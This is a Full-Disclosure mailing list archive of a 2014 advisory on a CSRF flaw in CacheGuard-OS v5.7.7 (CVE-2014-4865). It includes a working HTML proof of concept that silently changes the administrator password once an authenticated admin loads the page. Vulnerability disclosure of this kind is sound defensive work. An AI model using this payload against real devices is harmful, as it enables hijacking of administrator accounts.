lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAOmMdVsWtf6P=-bYg23Sv0d4Re2sQzubWOU2KCr=4_pavHfTiA@mail.gmail.com>
Date: Wed, 10 Sep 2014 12:38:18 -0300
From: William Costa <william.costa@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CSRF vulnerabilities in CacheGuard-OS v5.7.7 (CVE-2014-4865)

I. VULNERABILITY

-------------------------

CSRF vulnerabilities in CacheGuard-OS v5.7.7

II. BACKGROUND

-------------------------

CacheGuard is an All-in-One Web Security Gateway providing firewall,
web antivirus, caching, compression, URL filtering, proxy, high
availability, content filtering, bandwidth saving, bandwidth shaping,
Quality of Service and more.



III. DESCRIPTION

-------------------------

Has been detected a CSRF  vulnerability in CacheGuard in
"/gui/password-wadmin.apl"



IV. PROOF OF CONCEPT

-------------------------

The application does not validate the parameter any csrf_token
"/gui/password-wadmin.apl".



<html>



<body onload="CSRF.submit();">

<br>

<br>



<form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl"
method="post" name="CSRF">

<input name="password1" value="admin@...4" type=hidden> </input>

<input name="password2" value="admin@...4" type=hidden> </input>

</form>



</body>

</html>



V. BUSINESS IMPACT

-------------------------



CSRF allow the execution attackers to modify settings or change
password of user administrator in CacheGuard, because this functions
are not protected by CSRF-Tokens.



VI. REQUIREMENTS

-----------------------

An Attacker needs to know the IP of the device.

An Administrator needs an authenticated connection to the device.



VII. SYSTEMS AFFECTED

-------------------------

Try CacheGuard-OS v5.7.7



VIII. SOLUTION

-------------------------

All functions must be protected by CSRF-Tokens.

http://www.kb.cert.org/vuls/id/241508

By William Costa
william.costa no spam gmail.com

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ